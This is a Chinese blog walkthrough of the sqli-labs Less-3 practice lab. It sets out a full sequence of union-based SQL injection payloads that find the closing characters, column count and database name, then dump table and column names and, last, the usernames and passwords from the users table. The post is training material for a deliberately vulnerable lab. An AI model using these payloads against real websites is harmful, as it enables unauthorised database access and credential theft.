SQL注入实例(sqli-labs/less-3)

魏大橙2024-08-04 12:34

0、初始页面

1、确定闭合字符

确定为字符型注入

复制代码 
?id=1 and 1=1 
?id=1 and 1=2

确定闭合字符为 ')

复制代码 
?id=1'
?id=1')

2、确定表的列数

确定查询表的列数为3

复制代码 
?id=1') order by 3 --+

3、确定回显位置

确定回显位置为第二列和第三列

复制代码 
?id=-1') union select 1,2,3 --+

4、爆库名

当前所在数据库为security

复制代码 
?id=-1') union select 1,user(),database() --+

5、爆表名

查看users表

复制代码 
?id=-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema = 'security' --+

6、爆列名

复制代码 
?id=-1') union select 1,2,group_concat(column_name) from information_schema.columns where table_schema = 'security' and table_name = 'users' --+

7、显示最终结果

复制代码 
?id=-1%27) union select 1,2,group_concat(username,0x3a,password) from security.users --+
相关推荐
czlczl200209255 分钟前
普通索引和唯一索引 查询性能差异
数据库
@小柯555m15 分钟前
MySql(正则表达式--电话号码格式校验)
数据库·sql·mysql·正则表达式
van久15 分钟前
Day29:Redis 缓存实战
数据库·redis·缓存
.柒宇.23 分钟前
Redis哨兵模式详解
数据库·redis·bootstrap
重生之小比特23 分钟前
【MySQL 数据库】复合查询
android·数据库·mysql
夕除23 分钟前
spring boot --07
数据库·sql
Elastic 中国社区官方博客24 分钟前
Elasticsearch:为 AI Agent builder 创建 skill plugin
大数据·数据库·人工智能·elasticsearch·搜索引擎·ai·全文检索
Data_Journal25 分钟前
2026年十大数据集网站
大数据·开发语言·数据库·人工智能·python
珠海西格电力32 分钟前
如何实现零碳园区管理系统“云-边-端”架构的协同
大数据·数据库·人工智能·架构·能源
XS03010638 分钟前
JDBC实现数据库增删改查
数据库
热门推荐
01GitHub 镜像站点02Codex 接入 DeepSeek API 完整配置文档03零基础教你claude code 接入 deepseek V404【AI】2026 年具身智能模型和世界模型总结05CC-Switch & Claude 基于 Linux 服务器安装使用指南06要裂开了!ChatGPT要手机号验证了?注册Codex要求验证电话号码怎么办?2026年登陆Codex要手机号验证的解决办法07Windows端Codex接入第三方模型(DeekSeek,BaiLian)08Dirtyfrag漏洞:我花了一下午搞清楚这个Linux内核提权漏洞到底在搞什么092026年AI前瞻:量子AI、具身智能与科学发现的新纪元10裂开!ChatGPT 居然开始要手机号验证,附详细解决方法